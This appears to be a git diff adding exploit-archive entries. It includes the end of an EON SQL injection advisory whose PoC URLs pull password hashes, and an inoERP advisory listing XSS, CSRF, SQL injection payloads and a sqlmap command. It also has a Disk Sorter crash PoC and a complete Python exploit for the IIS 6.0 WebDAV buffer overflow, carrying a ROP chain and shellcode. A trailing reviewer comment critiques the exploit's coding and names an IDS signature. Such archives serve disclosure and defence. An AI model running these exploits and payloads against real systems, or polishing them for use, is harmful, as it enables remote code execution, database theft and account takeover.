https://eonweb.local/module/monitoring_ged/ajax.php?queue=active&type=1%27+AND+(SELECT+sleep(5))+AND+%271%27=%271&owner=&filter=equipment&search=&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=
|
||||
```
|
||||
|
||||
#### Vulnerable code
|
||||
|
||||
The vulnerable code can be found inside the
|
||||
`module/monitoring_ged/ajax.php` file, line 64:
|
||||
|
||||
```
|
||||
if($_GET["type"] == 0){
|
||||
$ged_where = "WHERE pkt_type_id!='0'";
|
||||
} else {
|
||||
$ged_where = "WHERE pkt_type_id='".$_GET["type"]."'";
|
||||
}
|
||||
$gedsql_result1=sqlrequest($database_ged,"SELECT
|
||||
pkt_type_id,pkt_type_name FROM pkt_type $ged_where AND pkt_type_id<'100';");
|
||||
```
|
||||
|
||||
### Proof of Concept 3
|
||||
|
||||
The following HTTP request allows an attacker to dump the database
|
||||
contents using SQL injections inside the `search` parameter:
|
||||
|
||||
```
|
||||
https://eonweb.local/module/monitoring_ged/ajax.php?queue=active&type=1&owner=&filter=equipment&search='+AND+(select+sleep(5))+AND+'1'='1&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=
|
||||
```
|
||||
|
||||
|
||||
#### Vulnerable code
|
||||
|
||||
The vulnerable code can be found inside the
|
||||
`module/monitoring_ged/ged_functions.php` file, line 129.
|
||||
|
||||
```
|
||||
if($search != ""){
|
||||
$like = "";
|
||||
if( substr($search, 0, 1) === '*' ){
|
||||
$like .= "%";
|
||||
}
|
||||
$like .= trim($search, '*');
|
||||
if ( substr($search, -1) === '*' ) {
|
||||
$like .= "%";
|
||||
}
|
||||
|
||||
$where_clause .= " AND $filter LIKE '$like'";
|
||||
}
|
||||
```
|
||||
|
||||
|
||||
### Proof of Concept 4
|
||||
|
||||
The following HTTP request allows an attacker to dump the database
|
||||
contents using SQL injections inside the `equipment` parameter:
|
||||
|
||||
```
|
||||
https://eonweb.local/module/monitoring_ged/ged_actions.php?action=advancedFilterSearch&filter=(select+user_passwd+from+eonweb.users+limit
|
||||
1)&queue=history
|
||||
```
|
||||
|
||||
|
||||
#### Vulnerable code
|
||||
|
||||
The vulnerable code can be found inside the
|
||||
`module/monitoring_ged/ged_functions.php` file, line 493:
|
||||
|
||||
```
|
||||
$gedsql_result1=sqlrequest($database_ged,"SELECT
|
||||
pkt_type_id,pkt_type_name FROM pkt_type WHERE pkt_type_id!='0' AND
|
||||
pkt_type_id<'100';");
|
||||
|
||||
|
||||
while($ged_type = mysqli_fetch_assoc($gedsql_result1)){
|
||||
$sql = "SELECT DISTINCT $filter FROM
|
||||
".$ged_type["pkt_type_name"]."_queue_".$queue;
|
||||
|
||||
$results = sqlrequest($database_ged, $sql);
|
||||
while($result = mysqli_fetch_array($results)){
|
||||
if( !in_array($result[$filter], $datas) && $result[$filter] != "" ){
|
||||
array_push($datas, $result[$filter]);
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
|
||||
## Timeline (dd/mm/yyyy)
|
||||
|
||||
* 01/10/2016 : Initial discovery.
|
||||
* 09/10/2016 : Fisrt contact with vendor.
|
||||
* 23/10/2016 : Technical details sent to the security contact.
|
||||
* 27/10/2016 : Vendor akwnoledgement and first patching attempt.
|
||||
* 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed.
|
||||
* 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our
|
||||
repsonsible disclosure agreement.
|
||||
* 14/03/2017 : Public disclosure.
|
||||
|
||||
Thank you to EON for the fast response.
|
||||
|
||||
## Solution
|
||||
|
||||
Update to version 5.1.
|
||||
|
||||
## Affected versions
|
||||
|
||||
* Version <= 5.0
|
||||
|
||||
## Credits
|
||||
|
||||
* Nicolas SERRA <n.serra@sysdream.com>
|
||||
|
||||
-- SYSDREAM Labs <labs@sysdream.com>
|
||||
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
|
||||
* Website: https://sysdream.com/
|
||||
* Twitter: @sysdream
|
157
platforms/php/webapps/41749.txt
Executable file
157
platforms/php/webapps/41749.txt
Executable file
|
@ -0,0 +1,157 @@
|
|||
=== FOXMOLE - Security Advisory 2017-01-25 ===
|
||||
|
||||
inoERP - Multiple Issues
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Affected Versions
|
||||
=================
|
||||
inoERP 0.6.1
|
||||
|
||||
Issue Overview
|
||||
==============
|
||||
Vulnerability Type: SQL Injection, Cross Site Scripting, Cross Site Request Forgery, Session Fixation
|
||||
Technical Risk: critical
|
||||
Likelihood of Exploitation: medium
|
||||
Vendor: inoERP
|
||||
Vendor URL: http://inoideas.org/ / https://github.com/inoerp/inoERP
|
||||
Credits: FOXMOLE employee Tim Herres
|
||||
Advisory URL: https://www.foxmole.com/advisories/foxmole-2017-01-25.txt
|
||||
Advisory Status: Public
|
||||
OVE-ID: OVE-20170126-0002
|
||||
CVSS 2.0: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
|
||||
|
||||
|
||||
Impact
|
||||
======
|
||||
There are multiple SQL Injection vulnerabilities, exploitable without authentication.
|
||||
An attacker could use the SQL Injection to access the database in an unsafe way.
|
||||
This means there is a high impact to all applications.
|
||||
The inoERP software also lacks in input validation resulting in different reflected/stored XSS vulnerabilities.
|
||||
|
||||
|
||||
Issue Description
|
||||
=================
|
||||
The following findings are only examples, there are quite more. The whole application should be reviewed.
|
||||
|
||||
All items tested using FF52.
|
||||
|
||||
1.) Cross Site Scripting:
|
||||
Stored:
|
||||
Create a new Question in the -->Forum --> Ask a question
|
||||
Vulnerable fields : Title, Content
|
||||
Used Payload: Test<script>alert("xss")</script>
|
||||
|
||||
Response:
|
||||
[...]
|
||||
<title>Test<script>alert("xss")</script> - inoERP!</title>
|
||||
[...]
|
||||
|
||||
The latest questions are included in the start page which means the entered payload gets executed directly in the start page.
|
||||
|
||||
Reflected:
|
||||
With Auth:
|
||||
http://192.168.241.143/inoerp/form.php?class_name=%3CscRipt%3Ealert(%22xss%22)%3C%2fscRipt%3E&mode=9&user_id=7
|
||||
http://192.168.241.143/inoerp/includes/json/json_blank_search.php?class_name=content&content_type_id=49&window_type=%22%3C/scRipt%3E%3CscRipt%3Ealert(%22xss%22)
|
||||
%3C/scRipt%3E
|
||||
http://192.168.241.143/inoerp/program.php?class_name=%3CscRipt%3Ealert(%22xss%22)%3C%2fscRipt%3E&program_name=prg_all_combinations&program_type=download_report
|
||||
|
||||
Unauthenticated:
|
||||
http://192.168.241.143/inoerp/index.php/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%22xss%22)%3C/scRipt%3E
|
||||
|
||||
2.) No protection against Cross Site Request Forgery Attacks:
|
||||
PoC: Changing the admin user credentials.
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://<IP>/inoerp/form.php?class_name=user" method="POST">
|
||||
<input type="hidden" name="headerData[0][name]" value="user_id[]" />
|
||||
<input type="hidden" name="headerData[0][value]" value="1" />
|
||||
<input type="hidden" name="headerData[1][name]" value="username[]" />
|
||||
<input type="hidden" name="headerData[1][value]" value="inoerp" />
|
||||
<input type="hidden" name="headerData[2][name]" value="enteredPassword[]" />
|
||||
<input type="hidden" name="headerData[2][value]" value="test" />
|
||||
<input type="hidden" name="headerData[3][name]" value="enteredRePassword[]" />
|
||||
<input type="hidden" name="headerData[3][value]" value="test" />
|
||||
<input type="hidden" name="headerData[4][name]" value="first_name[]" />
|
||||
<input type="hidden" name="headerData[4][value]" value="inoerp" />
|
||||
<input type="hidden" name="headerData[5][name]" value="last_name[]" />
|
||||
<input type="hidden" name="headerData[5][value]" value="inoerp" />
|
||||
<input type="hidden" name="headerData[6][name]" value="email[]" />
|
||||
<input type="hidden" name="headerData[6][value]" value="inoerp@no-site.com" />
|
||||
<input type="hidden" name="headerData[7][name]" value="phone[]" />
|
||||
[..snipped...]
|
||||
|
||||
If a privileged user activates the request, the admin user id=1 is set to "test".
|
||||
|
||||
3.) SQL Injection:
|
||||
Auth required:No
|
||||
#####
|
||||
http://192.168.241.143/inoerp/form.php?
|
||||
Parameter: module_code (GET)
|
||||
Type: boolean-based blind
|
||||
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
|
||||
GROUP BY clause
|
||||
Payload: module_code=test' RLIKE (SELECT (CASE WHEN (2838=2838) THEN
|
||||
0x74657374 ELSE 0x28 END))-- qkmO
|
||||
|
||||
Type: error-based
|
||||
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
|
||||
GROUP BY clause (FLOOR)
|
||||
Payload: module_code=test' AND (SELECT 8706 FROM(SELECT
|
||||
COUNT(*),CONCAT(0x716b7a6271,(SELECT
|
||||
(ELT(8706=8706,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM
|
||||
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NPEq
|
||||
|
||||
Type: stacked queries
|
||||
Title: MySQL > 5.0.11 stacked queries (comment)
|
||||
Payload: module_code=test';SELECT SLEEP(5)#
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 OR time-based blind
|
||||
Payload: module_code=test' OR SLEEP(5)-- STgC
|
||||
|
||||
Exploitable using e.g. SQLMAP
|
||||
|
||||
Blind SQL Injection:
|
||||
sqlmap -u
|
||||
"http://192.168.241.143/inoerp/content.php?content_type%5b%5d=test&search_text=3&search_document_list%5b%5d=all"
|
||||
-p "content_type%5b%5d" --dbms="MySQL"
|
||||
Parameter: content_type[] (GET)
|
||||
Type: boolean-based blind
|
||||
Title: OR boolean-based blind - WHERE or HAVING clause
|
||||
Payload: content_type[]=-8366' OR 7798=7798 AND
|
||||
'eanR'='eanR&search_text=3&search_document_list[]=all
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 OR time-based blind
|
||||
Payload: content_type[]=test' OR SLEEP(5) AND
|
||||
'exIO'='exIO&search_text=3&search_document_list[]=all
|
||||
#####
|
||||
|
||||
4.) Session Fixation:
|
||||
After a successful login the SessionID PHPSESSID remains the same:
|
||||
Before Login: INOERP123123=t4e5ef5kqnv6d1u2uguf7lraa2
|
||||
After Login: INOERP123123=t4e5ef5kqnv6d1u2uguf7lraa2
|
||||
|
||||
|
||||
|
||||
|
||||
Temporary Workaround and Fix
|
||||
============================
|
||||
FOXMOLE advises to restrict the access to all vulnerable inoERP systems until all vulnerabilities are fixed.
|
||||
|
||||
|
||||
|
||||
History
|
||||
=======
|
||||
2017-01-25 Issue discovered
|
||||
2017-01-26 Vendor contacted -> no response
|
||||
2017-02-20 Vendor contacted again -> no response
|
||||
2017-03-06 Vendor contacted again -> no response
|
||||
2017-03-27 Advisory Release
|
||||
|
||||
|
||||
GPG Signature
|
||||
=============
|
||||
This advisory is signed with the GPG key of the FOXMOLE advisories team.
|
||||
The key can be downloaded here: https://www.foxmole.com/advisories-key-3812092199E3277C.asc
|
177
platforms/windows/dos/41734.c
Executable file
177
platforms/windows/dos/41734.c
Executable file
File diff suppressed because one or more lines are too long
51
platforms/windows/dos/41737.txt
Executable file
51
platforms/windows/dos/41737.txt
Executable file
|
@ -0,0 +1,51 @@
|
|||
[+] Title: Disk Sorter Server v9.5.12 - Local Stack-based buffer overflow
|
||||
[+] Credits / Discovery: Nassim Asrir
|
||||
[+] Author Email: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
|
||||
[+] Author Company: Henceforth
|
||||
[+] CVE: N/A
|
||||
|
||||
Vendor:
|
||||
===============
|
||||
|
||||
http://www.disksorter.com/
|
||||
|
||||
|
||||
Download:
|
||||
===========
|
||||
|
||||
http://www.disksorter.com/setups/disksortersrv_setup_v9.5.12.exe
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
===================
|
||||
|
||||
local stack-based buffer overflow
|
||||
|
||||
|
||||
POC:
|
||||
===================
|
||||
|
||||
Launch the program click on :
|
||||
|
||||
1 - Server
|
||||
|
||||
2 - Connect
|
||||
|
||||
3 - and in the Share Name field inject (5000 "A") then the program crashed see the picture.
|
||||
|
||||
CVE Reference:
|
||||
===============
|
||||
|
||||
N/A
|
||||
|
||||
|
||||
Tested on:
|
||||
===============
|
||||
|
||||
Windows 7
|
||||
|
||||
Win xp
|
||||
|
||||
|
||||
|
||||
|
45
platforms/windows/remote/41738.py
Executable file
45
platforms/windows/remote/41738.py
Executable file
|
@ -0,0 +1,45 @@
|
|||
'''
|
||||
Description:Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
|
||||
|
||||
Additional Information: the ScStoragePathFromUrl function is called twice
|
||||
Vulnerability Type: Buffer overflow
|
||||
Vendor of Product: Microsoft
|
||||
Affected Product Code Base: Windows Server 2003 R2
|
||||
Affected Component: ScStoragePathFromUrl
|
||||
Attack Type: Remote
|
||||
Impact Code execution: true
|
||||
Attack Vectors: crafted PROPFIND data
|
||||
|
||||
Has vendor confirmed or acknowledged the vulnerability?:true
|
||||
|
||||
Discoverer:Zhiniang Peng and Chen Wu.
|
||||
Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China
|
||||
'''
|
||||
|
||||
#------------Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous.
|
||||
#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China
|
||||
#-----------Email: edwardz@foxmail.com
|
||||
|
||||
import socket
|
||||
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
sock.connect(('127.0.0.1',80))
|
||||
|
||||
pay='PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
|
||||
pay+='If: <http://localhost/aaaaaaa'
|
||||
pay+='\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
|
||||
pay+='>'
|
||||
pay+=' (Not <locktoken:write1>) <http://localhost/bbbbbbb'
|
||||
pay+='\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\x
a9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
|
||||
|
||||
shellcode='VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O02LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA'
|
||||
|
||||
pay+=shellcode
|
||||
pay+='>\r\n\r\n'
|
||||
print pay
|
||||
|
||||
sock.send(pay)
|
||||
data = sock.recv(80960)
|
||||
|
||||
print data
|
||||
sock.close
|
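Review bot: `sock.close` on the last line of the script is an attribute reference, not a call, so the socket is never closed; it should read `sock.close()`, or the connection should be wrapped in `with contextlib.closing(sock):` so it is released even if `send`/`recv` raise. The file is Python 2 only: `print pay` and `print data` are statement-form prints, and the `\xNN` escapes in `pay` only produce raw bytes under 2.x, so on Python 3 `sock.send(pay)` would fail with a TypeError on a `str` argument; a `#!/usr/bin/env python2` line or a comment naming the interpreter version would spare a reader the guess. `data = sock.recv(80960)` performs a single read and may return only part of the server's response, so `print data` is best-effort rather than a reliable view of the reply. On the defensive side, what the script transmits is exactly the signal the description already names: a PROPFIND whose `If:` header carries a resource URL far longer than any legitimate client emits, which is the pattern an IDS or WAF rule for this issue should match on.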